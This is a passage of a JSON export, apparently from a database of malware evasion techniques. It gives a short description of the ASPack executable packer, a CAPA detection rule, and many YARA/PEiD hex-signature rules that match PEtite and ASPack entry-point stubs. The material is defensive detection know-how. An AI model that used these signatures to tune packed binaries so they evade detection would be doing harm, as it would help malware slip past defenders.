70 74 20 44 61 74 61 21 00 8B 64 24 24 8B 04 24 83 C4 26 8B D0 66 81 C2 6D 01 6A 10 8B D8 66 05 66 01 50 52 6A 00 8B 13 FF 14 1A 6A FF FF 93 ?? ?? 00 00 56 57 8B 7C 24 0C 8B 74 24 10 8B 4C 24 14 C1 F9 02 F3 A5 8B 4C 24 14 83 E1 03 F3 A4 5F 5E C3 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule MSLRH_v032a_fake_PEtite_21_emadicius: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 00 50 40 00 6A 00 68 BB 21 40 00 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 66 9C 60 50 83 C4 04 61 66 9D 64 8F 05 00 00 00 00 83 C4 08 EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 E8 02 00 00 00 29 5A 58 6B C0 03 E8 02 00 00 00 29 5A 83 C4 04 58 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Petite_22_c1998_99_Ian_Luck_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 68 ?? ?? ?? ?? 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 66 9C 60 50 68 00 00 ?? ?? 8B 3C 24 8B 30 66 81 C7 80 07 8D 74 06 08 89 38 8B 5E 10 50 56 6A 02 68 80 08 00 00 57 6A ?? 6A 06 56 6A 04 68 80 08 00 00 57 FF D3 83 EE 08 59 F3 A5 59 66 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Petite_12_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 66 9C 60 E8 CA 00 00 00 03 00 04 00 05 00 06 00 07 00 08 00 09 00 0A 00 0B 00 0D 00 0F 00 11 00 13 00 17 00 1B 00 1F 00 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 83 00 A3 00 C3 00 E3 00 02 01 00 00 00 00 00 00 00 00 00 00 00 00 01 01 01 01 02 02 02 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PEtite_v21_Ian_Luck: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 ?? ?? ?? ?? 6A 00 68 ?? ?? ?? ?? 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 66 9C 60 50 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PEtite_v20_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 ?? ?? ?? ?? 66 9C 60 50 8B D8 03 ?? 68 54 BC ?? ?? 6A ?? FF 50 18 8B CC 8D A0 54 BC ?? ?? 8B C3 8D 90 E0 15 ?? ?? 68 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule _PseudoSigner_01_PEtite_2x_level_0: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 90 90 90 68 ?? ?? ?? ?? 67 64 FF 36 00 00 67 64 89 26 00 00 F1 90 90 90 90 B8 00 90 90 00 6A 00 68 90 90 90 00 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 66 9C 60 50 8B D8 03 00 68 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}"
                }
            ]
        },
        {
            "id": 192,
            "unprotect_id": "U1411",
            "name": "AsPack",
            "categories": [
                {
                    "id": 12,
                    "key": "packers",
                    "label": "Packers"
                }
            ],
            "description": "ASPack is an EXE packer created to compress Win32 executable files and to protect them against reverse engineering.\r\n\r\nThe solution makes Windows programs and libraries smaller up to 70% what leads to a reduction in the download time of compressed applications in local networks and the Internet because of their smaller size compared to uncompressed apps.\r\n\r\nThe ASPack exe compressor also provides protection to programs/applications from unprofessional analysis, debuggers and decompilers.",
            "resources": "http://www.aspack.com/",
            "tags": "aspack",
            "snippets": [],
            "detection_rules": [
                {
                    "id": 95,
                    "key": "capa_detect_aspack",
                    "type": {
                        "id": 2,
                        "name": "CAPA",
                        "syntax_lang": "yaml"
                    },
                    "name": "CAPA_Detect_ASPACK",
                    "rule": "rule:\r\n  meta:\r\n    name: packed with ASPack\r\n    namespace: anti-analysis/packer/aspack\r\n    authors:\r\n      - william.ballenthin@mandiant.com\r\n    scope: file\r\n    att&ck:\r\n      - Defense Evasion::Obfuscated Files or Information::Software Packing [T1027.002]\r\n    mbc:\r\n      - Anti-Static Analysis::Software Packing [F0001]\r\n    references:\r\n      - http://www.aspack.com/\r\n      - https://www.hexacorn.com/blog/2016/12/15/pe-section-names-re-visited/\r\n    examples:\r\n      - 2055994ff75b4309eee3a49c5749d306\r\n  features:\r\n    - or:\r\n      - section: .aspack\r\n      - section: .adata\r\n      - section: .ASPack\r\n      - section: ASPack\r\n      - string: \"The procedure entry point %s could not be located in the dynamic link library %s\"\r\n      - string: \"The ordinal %u could not be located in the dynamic link library %s\""
                },
                {
                    "id": 109,
                    "key": "yara_detect_aspack",
                    "type": {
                        "id": 1,
                        "name": "YARA",
                        "syntax_lang": "YARA"
                    },
                    "name": "YARA_Detect_Aspack",
                    "rule": "rule ASPack_v107b_DLL: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 90 90 75 }\r\n        $b = { 60 E8 00 00 00 00 5D ?? ?? ?? ?? ?? ?? B8 ?? ?? ?? ?? 03 C5 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule ASPAck_1061b: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 90 75 00 E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_108: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 90 90 75 01 90 E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v212_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v2xx: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 70 05 ?? ?? EB }\r\n        $b = { A8 03 00 00 61 75 08 B8 01 00 00 00 C2 0C 00 68 00 00 00 00 C3 8B 85 26 04 00 00 8D 8D 3B 04 00 00 51 50 FF 95 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule ASPack_v21_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_102b: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 5D 81 ED 96 78 43 00 B8 90 78 43 00 03 C5 2B 85 7D 7C 43 00 89 85 89 7C 43 00 80 BD 74 7C 43 00 00 75 15 FE 85 74 7C 43 00 E8 1D 00 00 00 E8 F7 01 00 00 E8 8E 02 00 00 8B 85 75 7C 43 00 03 85 89 7C 43 00 89 44 24 1C 61 FF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v21: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E9 3D }\r\n        $b = { 60 E8 72 05 00 00 EB 33 87 DB 90 00 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule PackerAspack_v212_wwwaspackcom: PEiD\r\n{\r\n    strings:\r\n        $a = { ?8 ?? ?0 00 ?? ?? ?? ?? ?D ?? ?? ?? ?? ?? ?? ?? ?? ?? 5? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?3 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?F ?? ?? ?3 ?? ?? ?? 8? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?0 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?F 95 ?? ?? ?? ?? 8? ?? ?D ?? ?? ?? ?? 5? }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v211c_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 02 00 00 00 EB 09 5D 55 81 ED 39 39 44 00 C3 E9 59 04 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v104b_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 ?? ?? ?? ?? 5D 81 ED ?? ?? ?? ?? B8 ?? ?? ?? ?? 03 C5 2B 85 ?? 0B DE ?? 89 85 17 DE ?? ?? 80 BD 01 DE }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_105b_Solodovnikov_Alexey: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 5D 81 ED CE 3A 44 00 B8 C8 3A 44 00 03 C5 2B 85 B5 3E 44 00 89 85 C1 3E 44 00 80 BD AC 3E 44 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Aspack_v212_wwwaspackcom_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { ?8 ?? ?0 00 ?? ?? ?? ?? ?D ?? ?? ?? ?? ?? ?? ?? ?? ?? 5? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?3 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?F ?? ?? ?3 ?? ?? ?? 8? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?0 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?F 95 ?? ?? ?? ?? 8? ?? ?D ?? ?? ?? ?? 5? }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule AHTeam_EP_Protector_03_fake_ASPack_212_FEUERRADER: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 90 FF E0 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_108_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 90 90 75 01 90 E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule MSLRH_v032a_fake_ASPack_211d_emadicius: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 02 00 00 00 EB 09 5D 55 81 ED 39 39 44 00 C3 61 EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 E8 02 00 00 00 29 5A 58 6B C0 03 E8 02 00 00 00 29 5A 83 C4 04 58 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v102a_Alexey_Solodovnikov: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 ?? ?? ?? ?? 5D 81 ED 3E D9 43 ?? B8 38 ?? ?? ?? 03 C5 2B 85 0B DE 43 ?? 89 85 17 DE 43 ?? 80 BD 01 DE 43 ?? ?? 75 15 FE 85 01 DE 43 ?? E8 1D ?? ?? ?? E8 79 02 ?? ?? E8 12 03 ?? ?? 8B 85 03 DE 43 ?? 03 85 17 DE 43 ?? 89 44 24 1C 61 FF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v2000_Alexey_Solodovnikov: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 70 05 00 00 EB 4C }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule MSLRH_v032a_fake_ASPack_211d_emadicius_h: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 02 00 00 00 EB 09 5D 55 81 ED 39 39 44 00 C3 61 EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 E8 02 00 00 00 29 5A 58 6B C0 03 E8 02 00 00 00 29 5A 83 C4 04 58 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_105b_by_Hint_WIN_EP: PEiD\r\n{\r\n    strings:\r\n        $a = { 75 00 E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_1083: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 5D 81 ED 0A 4A 44 00 BB 04 4A 44 00 03 DD 2B 9D B1 50 44 00 83 BD AC 50 44 00 00 89 9D BB 4E 44 00 0F 85 17 05 00 00 8D 85 D1 50 44 00 50 FF 95 94 51 44 00 89 85 CD 50 44 00 8B F8 8D 9D DE 50 44 00 53 50 FF 95 90 51 44 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v108_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 75 01 FF E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_102a_Solodovnikov_Alexey: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 5D 81 ED 3E D9 43 00 B8 38 ?? ?? 00 03 C5 2B 85 0B DE 43 00 89 85 17 DE 43 00 80 BD 01 DE 43 00 00 75 15 FE 85 01 DE 43 00 E8 1D 00 00 00 E8 79 02 00 00 E8 12 03 00 00 8B 85 03 DE 43 00 03 85 17 DE 43 00 89 44 24 1C 61 FF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v106b_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 61 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 83 CD FF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v211d_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 02 00 00 00 CD 20 E8 00 00 00 00 5E 2B C9 58 74 02 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v212: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 03 ?? ?? ?? E9 EB 04 5D 45 55 C3 E8 }\r\n        $b = { 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule ASPack_v211: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 02 ?? ?? ?? EB 09 5D 55 81 ED 39 39 44 ?? C3 E9 3D }\r\n        $b = { 60 E9 3D 04 00 00 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule _PseudoSigner_01_ASPack_2xx_Heuristic_Anorganix: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 90 90 90 68 ?? ?? ?? ?? 67 64 FF 36 00 00 67 64 89 26 00 00 F1 90 90 90 90 A8 03 00 00 61 75 08 B8 01 00 00 00 C2 0C 00 68 00 00 00 00 C3 8B 85 26 04 00 00 8D 8D 3B 04 00 00 51 50 FF 95 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_101b_Solodovnikov_Alexey: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 5D 81 ED D2 2A 44 00 B8 CC 2A 44 00 03 C5 2B 85 A5 2E 44 00 89 85 B1 2E 44 00 80 BD 9C 2E 44 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Aspack_v212_wwwaspackcom: PEiD\r\n{\r\n    strings:\r\n        $a = { ?8 ?? ?0 00 ?? ?? ?? ?? ?D ?? ?? ?? ?? ?? ?? ?? ?? ?? 5? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?3 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?F ?? ?? ?3 ?? ?? ?? 8? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?0 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?F 95 ?? ?? ?? ?? 8? }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v2xx_Alexey_Solodovnikov: PEiD\r\n{\r\n    strings:\r\n        $a = { A8 03 00 00 61 75 08 B8 01 00 00 00 C2 0C 00 68 00 00 00 00 C3 8B 85 26 04 00 00 8D 8D 3B 04 00 00 51 50 FF 95 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v2001_Alexey_Solodovnikov: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 72 05 00 00 EB 4C }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule MSLRH_032a_fake_ASPack_212_emadicius: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 73 00 00 61 EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 E8 02 00 00 00 29 5A 58 6B }\r\n        $b = { 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 A0 02 EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 E8 02 00 00 00 29 5A 58 6B C0 03 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule _PseudoSigner_01_ASPack_2xx_Heuristic_Anorganix_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 90 90 90 68 ?? ?? ?? ?? 67 64 FF 36 00 00 67 64 89 26 00 00 F1 90 90 90 90 A8 03 00 00 61 75 08 B8 01 00 00 00 C2 0C 00 68 00 00 00 00 C3 8B 85 26 04 00 00 8D 8D 3B 04 00 00 51 50 FF 95 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v107b_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 ?? ?? ?? ?? 5D 81 ED ?? ?? ?? ?? 60 E8 2B 03 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v100b_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 ?? ?? ?? ?? 5D 81 ED 3E D9 43 ?? B8 38 ?? ?? ?? 03 C5 2B 85 0B DE 43 ?? 89 85 17 DE 43 ?? 80 BD 01 DE 43 ?? ?? 75 15 FE 85 01 DE 43 ?? E8 1D ?? ?? ?? E8 79 02 ?? ?? E8 12 03 ?? ?? 8B 85 03 DE 43 ?? 03 85 17 DE 43 ?? 89 44 24 1C 61 FF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v211c_Alexey_Solodovnikov: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 02 00 00 00 EB 09 5D 55 81 ED 39 39 44 00 C3 E9 59 04 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v211b_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 02 00 00 00 EB 09 5D 55 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_105b_by: PEiD\r\n{\r\n    strings:\r\n        $a = { 75 00 E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule MSLRH_v032a_fake_ASPack_212_emadicius_h_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 A0 02 EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 E8 02 00 00 00 29 5A 58 6B C0 03 E8 02 00 00 00 29 5A 83 C4 04 58 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v10802_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 75 01 90 E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v2001_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 72 05 00 00 EB 33 87 DB 90 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v107b: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 ?? ?? ?? ?? 5D B8 03 }\r\n        $b = { 60 E8 ?? ?? ?? ?? 5D 81 ED ?? ?? ?? ?? B8 ?? ?? ?? ?? 03 C5 2B 85 ?? 0B DE ?? 89 85 17 DE ?? ?? 80 BD 01 DE }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule ASPack_100b_Solodovnikov_Alexey: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 5D 81 ED 92 1A 44 00 B8 8C 1A 44 00 03 C5 2B 85 CD 1D 44 00 89 85 D9 1D 44 00 80 BD C4 1D 44 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v101b_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 ?? ?? ?? ?? 5D 81 ED CE 3A 44 ?? B8 C8 3A 44 ?? 03 C5 2B 85 B5 3E 44 ?? 89 85 C1 3E 44 ?? 80 BD AC 3E 44 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v10801_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 EB 0A 5D EB 02 FF 25 45 FF E5 E8 E9 E8 F1 FF FF FF E9 81 ED 23 6A 44 00 BB 10 ?? 44 00 03 DD 2B 9D 72 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v10802_Hint_WIN_EP: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 75 01 90 E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v2xx_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { A8 03 ?? ?? 61 75 08 B8 01 ?? ?? ?? C2 0C ?? 68 ?? ?? ?? ?? C3 8B 85 26 04 ?? ?? 8D 8D 3B 04 ?? ?? 51 50 FF 95 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v101b: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 5D 81 ED 3E D9 43 B8 38 03 C5 2B 85 0B DE 43 89 85 17 DE 43 80 BD 01 DE 43 75 15 FE 85 01 DE 43 E8 1D E8 79 02 E8 12 03 8B }\r\n        $b = { 60 E8 ?? ?? ?? ?? 5D 81 ED D2 2A 44 ?? B8 CC 2A 44 ?? 03 C5 2B 85 A5 2E 44 ?? 89 85 B1 2E 44 ?? 80 BD 9C 2E 44 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule ASPack_v10803_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 55 57 51 53 E8 ?? ?? ?? ?? 5D 8B C5 81 ED ?? ?? ?? ?? 2B 85 ?? ?? ?? ?? 83 E8 09 89 85 ?? ?? ?? ?? 0F B6 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_104b_Solodovnikov_Alexey: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 5D 81 ED ?? ?? ?? 00 B8 ?? ?? ?? 00 03 C5 2B 85 ?? 12 9D ?? 89 85 1E 9D ?? 00 80 BD 08 9D ?? 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_107b_Solodovnikov_Alexey: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 75 ?? E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v103b: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 5D 81 ED CE 3A 44 B8 C8 3A 44 03 C5 2B 85 B5 3E 44 89 85 C1 3E 44 80 BD AC 3E }\r\n        $b = { 60 E8 ?? ?? ?? ?? 5D 81 ED AE 98 43 ?? B8 A8 98 43 ?? 03 C5 2B 85 18 9D 43 ?? 89 85 24 9D 43 ?? 80 BD 0E 9D 43 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule ASPack_102b_or_10803: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 5D 81 ED }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v211d: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 03 ?? ?? ?? E9 EB 04 5D 45 55 C3 E8 01 ?? ?? ?? EB 5D BB ED FF FF FF 03 DD 81 }\r\n        $b = { 60 E8 02 00 00 00 EB 09 5D 55 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule ASPack_v211b: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 02 ?? ?? ?? EB 09 5D 55 81 ED 39 39 44 ?? C3 E9 59 }\r\n        $b = { 60 E8 02 00 00 00 EB 09 5D 55 81 ED 39 39 44 00 C3 E9 3D 04 00 00 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule ASPack_v211c: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 02 ?? ?? ?? EB 09 5D }\r\n        $b = { 60 E8 02 00 00 00 EB 09 5D 55 81 ED 39 39 44 00 C3 E9 59 04 00 00 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule ASPack_v105b_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 ?? ?? ?? ?? 5D 81 ED CE 3A 44 ?? B8 C8 3A 44 ?? 03 C5 2B 85 B5 3E 44 ?? 89 85 C1 3E 44 ?? 80 BD AC 3E 44 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule MSLRH_032a_fake_ASPack_212_emadicius_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 02 00 00 00 EB 09 5D 55 81 ED 39 39 44 00 C3 61 EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 E8 02 00 00 00 29 5A 58 6B C0 03 E8 02 00 00 00 29 5A 83 C4 04 58 74 04 75 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v102b_Alexey_Solodovnikov: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 5D 81 ED 96 78 43 00 B8 90 78 43 00 03 C5 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_108_Solodovnikov_Alexey: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 75 01 FF E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v1061b_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 ?? ?? ?? ?? 5D 81 ED EA A8 43 ?? B8 E4 A8 43 ?? 03 C5 2B 85 78 AD 43 ?? 89 85 84 AD 43 ?? 80 BD 6E AD 43 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v102a_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 ?? ?? ?? ?? 5D 81 ED 06 ?? ?? ?? 64 A0 23 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_2xwithouth_Poly_Solodovnikov_Alexey: PEiD\r\n{\r\n    strings:\r\n        $a = { ?? 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB EC FF FF FF 03 DD 81 EB 00 40 1C 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_1061b_DLL: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 5D 81 ED EA A8 43 00 B8 E4 A8 43 00 03 C5 2B 85 78 AD 43 00 89 85 84 AD 43 00 80 BD 